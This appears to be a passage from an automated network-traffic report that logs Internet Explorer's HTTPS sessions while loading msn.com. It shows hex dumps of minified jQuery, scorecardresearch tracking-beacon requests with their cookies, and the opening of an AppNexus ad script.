                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 45 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 45 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 45 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=E.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return E.each(this,e)},map:function(n){return this.pushStack(E.map(this,f
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 79 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=y.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 76 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 45 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 69 66 28 64 2e 63 73 73 53 75 70 70 6f 72 74 73 53 65 6c 65 63 74 6f 72 26 26 21 43 53 53 2e 73 75 70 70 6f 72 74 73 28 22 73 65 6c 65 63 74 6f
                                                                                                                                                                            Data Ascii: )){(f=ee.test(t)&&ve(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=E)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{if(d.cssSupportsSelector&&!CSS.supports("selecto
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 61 29 7b 72 65 74 75 72 6e 20 6c 65 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 2b 6f 2c 6c 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 76 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e
                                                                                                                                                                            Data Ascii: "in e&&e.disabled===t}}function ye(a){return le(function(o){return o=+o,le(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ve(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 53 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72 65 74 75 72 6e 20 6e 3f 5b 6e 5d 3a 5b 5d 7d 7d 29 3a 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65
                                                                                                                                                                            Data Ascii: ?(b.filter.ID=function(e){var t=e.replace(te,ne);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&S){var n=t.getElementById(e);return n?[n]:[]}}):(b.filter.ID=function(e){var n=e.replace
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 52 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 45 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 7e 3d 22 29 2c 28 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 27 27 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22
                                                                                                                                                                            Data Ascii: [selected]").length||y.push("\\["+M+"*(?:value|"+R+")"),e.querySelectorAll("[id~="+E+"-]").length||y.push("~="),(t=C.createElement("input")).setAttribute("name",""),e.appendChild(t),e.querySelectorAll("[name='']").length||y.push("\\["+M+"*name"+M+"*="+M+"
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 6e 74 45 6c 65 6d 65 6e 74 7c 7c 65 2c 72 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 7c 7c 21 28 21 72 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 6e 2e 63 6f 6e 74 61 69 6e 73 3f 6e 2e 63 6f 6e 74 61 69 6e 73 28 72 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 72 29 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 29 77 68 69 6c 65 28 74 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 6a 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75
                                                                                                                                                                            Data Ascii: ntElement||e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},j=t?function(e,t){if(e===t)retu


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            8192.168.2.54982618.165.220.1104433788C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:52 UTC519OUTGET /b?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                            Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                            Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: sb.scorecardresearch.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-12-11 08:39:52 UTC656INHTTP/1.1 302 Found
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:52 GMT
                                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                            Location: /b2?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                            set-cookie: UID=10451f5f0fc3adf6ec43d6f1733906392; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                                            Via: 1.1 f0e28236e1c4da7e6a02d601c5d0ceca.cloudfront.net (CloudFront)
                                                                                                                                                                            X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                            X-Amz-Cf-Id: TzWhc1pp_XK26QESdPYnDP02Bl2Pjqj-j0nTMOW8AiarbJ4o-8w4BQ==


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            9192.168.2.54982518.165.220.1104433788C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:52 UTC567OUTGET /b2?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                            Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                            Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: sb.scorecardresearch.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: UID=10451f5f0fc3adf6ec43d6f1733906392
                                                                                                                                                                            2024-12-11 08:39:53 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:52 GMT
                                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                                            Via: 1.1 c1ca71e6238e57e7b87d021fa60aad98.cloudfront.net (CloudFront)
                                                                                                                                                                            X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                            X-Amz-Cf-Id: llenXktn7Ww-zDJPuQnmt7pKL1HsD-Ps2vR3SH86-vkNSZEnbLXYdQ==


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            10192.168.2.54984918.165.220.1104433424C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:54 UTC566OUTGET /b?rn=1733906391803&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                            Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                            Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: sb.scorecardresearch.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: UID=10451f5f0fc3adf6ec43d6f1733906392
                                                                                                                                                                            2024-12-11 08:39:55 UTC434INHTTP/1.1 204 No Content
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:55 GMT
                                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                            set-cookie: UID=10451f5f0fc3adf6ec43d6f1733906392; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                                            Via: 1.1 5c23ab9748dfedff76d0f834e4ad56b0.cloudfront.net (CloudFront)
                                                                                                                                                                            X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                            X-Amz-Cf-Id: WJiitv0QDoAQaW6xYWIbQ8CyPpb9zPo5ShNCylXxqRMTVWvYHi97CQ==


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            11192.168.2.549879151.101.1.1084433424C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:40:01 UTC297OUTGET /ast/ast.js HTTP/1.1
                                                                                                                                                                            Accept: application/javascript, */*;q=0.8
                                                                                                                                                                            Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: acdn.adnxs.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-12-11 08:40:01 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Length: 149741
                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                            Last-Modified: Mon, 18 Nov 2024 18:01:14 GMT
                                                                                                                                                                            ETag: "673b80ea-248ed"
                                                                                                                                                                            Expires: Tue, 19 Nov 2024 18:02:42 GMT
                                                                                                                                                                            Cache-Control: max-age=86402
                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Age: 75966
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:01 GMT
                                                                                                                                                                            X-Served-By: cache-lga21942-LGA, cache-nyc-kteb1890025-NYC
                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                            X-Cache-Hits: 11, 0
                                                                                                                                                                            X-Timer: S1733906402.566500,VS0,VE1
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            2024-12-11 08:40:01 UTC1371INData Raw: 2f 2a 21 20 41 53 54 20 76 30 2e 36 36 2e 30 20 55 70 64 61 74 65 64 3a 20 32 30 32 34 2d 31 31 2d 31 38 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 69 66 28 74 5b 61 5d 29 72 65 74 75 72 6e 20 74 5b 61 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 61 5d 3d 7b 69 3a 61 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 61 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 6e 2e 63 3d 74 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 6e 2e 6f 28 65 2c 74 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72
                                                                                                                                                                            Data Ascii: /*! AST v0.66.0 Updated: 2024-11-18 */!function(e){var t={};function n(a){if(t[a])return t[a].exports;var r=t[a]={i:a,l:!1,exports:{}};return e[a].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=e,n.c=t,n.d=function(e,t,a){n.o(e,t)||Object.defineProper
                                                                                                                                                                            2024-12-11 08:40:01 UTC1371INData Raw: 7d 2c 22 6e 22 3a 7b 22 55 4e 44 45 46 49 4e 45 44 22 3a 22 75 6e 64 65 66 69 6e 65 64 22 2c 22 4f 42 4a 45 43 54 22 3a 22 6f 62 6a 65 63 74 22 2c 22 53 54 52 49 4e 47 22 3a 22 73 74 72 69 6e 67 22 2c 22 4e 55 4d 42 45 52 22 3a 22 6e 75 6d 62 65 72 22 7d 2c 22 65 22 3a 7b 22 49 45 22 3a 22 6d 73 69 65 22 2c 22 4f 50 45 52 41 22 3a 22 6f 70 65 72 61 22 7d 2c 22 71 22 3a 7b 22 4c 4f 41 44 45 44 22 3a 22 6c 6f 61 64 65 64 22 2c 22 49 4d 50 52 45 53 53 49 4f 4e 22 3a 22 69 6d 70 72 65 73 73 69 6f 6e 22 7d 2c 22 68 22 3a 7b 22 55 54 5f 42 41 53 45 22 3a 22 2f 75 74 2f 76 33 22 2c 22 49 4d 50 42 55 53 22 3a 22 69 62 2e 61 64 6e 78 73 2e 63 6f 6d 22 2c 22 49 4d 50 42 55 53 5f 53 49 4d 50 4c 45 22 3a 22 69 62 2e 61 64 6e 78 73 2d 73 69 6d 70 6c 65 2e 63 6f 6d 22
                                                                                                                                                                            Data Ascii: },"n":{"UNDEFINED":"undefined","OBJECT":"object","STRING":"string","NUMBER":"number"},"e":{"IE":"msie","OPERA":"opera"},"q":{"LOADED":"loaded","IMPRESSION":"impression"},"h":{"UT_BASE":"/ut/v3","IMPBUS":"ib.adnxs.com","IMPBUS_SIMPLE":"ib.adnxs-simple.com"
                                                                                                                                                                            2024-12-11 08:40:01 UTC1371INData Raw: 3a 22 68 74 74 70 73 3a 2f 2f 61 64 73 64 6b 70 72 6f 64 2e 61 7a 75 72 65 65 64 67 65 2e 6e 65 74 2f 61 73 73 65 74 73 2f 73 63 72 69 70 74 73 2f 6f 6d 2f 6f 6d 69 64 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 63 6c 69 65 6e 74 2d 76 31 2e 6a 73 22 7d 2c 22 69 22 3a 7b 22 52 45 51 55 45 53 54 22 3a 22 61 64 52 65 71 75 65 73 74 65 64 22 2c 22 41 56 41 49 4c 41 42 4c 45 22 3a 22 61 64 41 76 61 69 6c 61 62 6c 65 22 2c 22 4c 4f 41 44 45 44 22 3a 22 61 64 4c 6f 61 64 65 64 22 2c 22 4c 4f 41 44 45 44 5f 4d 45 44 49 41 54 45 44 22 3a 22 61 64 4c 6f 61 64 65 64 4d 65 64 69 61 74 65 64 22 2c 22 41 44 5f 43 4f 44 45 5f 53 54 41 52 54 5f 52 45 4e 44 45 52 22 3a 22 61 64 43 6f 64 65 52 65 6e 64 65 72 53 74 61 72 74 22 2c 22 4e 4f 5f 42 49 44 5f 4d 45 44 49 41 54 45
                                                                                                                                                                            Data Ascii: :"https://adsdkprod.azureedge.net/assets/scripts/om/omid-verification-client-v1.js"},"i":{"REQUEST":"adRequested","AVAILABLE":"adAvailable","LOADED":"adLoaded","LOADED_MEDIATED":"adLoadedMediated","AD_CODE_START_RENDER":"adCodeRenderStart","NO_BID_MEDIATE
                                                                                                                                                                            2024-12-11 08:40:01 UTC1371INData Raw: 2f 62 61 74 2e 62 69 6e 67 2e 63 6f 6d 2f 22 2c 22 54 52 55 53 54 45 44 5f 42 49 44 44 49 4e 47 5f 53 49 47 4e 41 4c 53 5f 55 52 4c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 62 2e 61 64 6e 78 73 2e 63 6f 6d 2f 70 73 2f 69 62 2f 70 61 2f 6b 76 22 2c 22 42 49 44 44 49 4e 47 5f 4c 4f 47 49 43 5f 55 52 4c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 61 74 2e 62 69 6e 67 2e 63 6f 6d 2f 70 61 2f 70 73 2f 78 2f 63 64 6e 2f 62 69 64 64 69 6e 67 2f 62 69 64 64 69 6e 67 2d 63 75 72 72 65 6e 74 2e 6a 73 22 2c 22 44 45 43 49 53 49 4f 4e 5f 4c 4f 47 49 43 5f 55 52 4c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 61 74 2e 62 69 6e 67 2e 63 6f 6d 2f 70 61 2f 70 73 2f 78 2f 63 64 6e 2f 73 63 6f 72 69 6e 67 2f 73 63 6f 72 69 6e 67 2d 63 75 72 72 65 6e 74 2e 6a 73 22 7d 7d 2c 22 63 22 3a 7b 22 4a
                                                                                                                                                                            Data Ascii: /bat.bing.com/","TRUSTED_BIDDING_SIGNALS_URL":"https://ib.adnxs.com/ps/ib/pa/kv","BIDDING_LOGIC_URL":"https://bat.bing.com/pa/ps/x/cdn/bidding/bidding-current.js","DECISION_LOGIC_URL":"https://bat.bing.com/pa/ps/x/cdn/scoring/scoring-current.js"}},"c":{"J
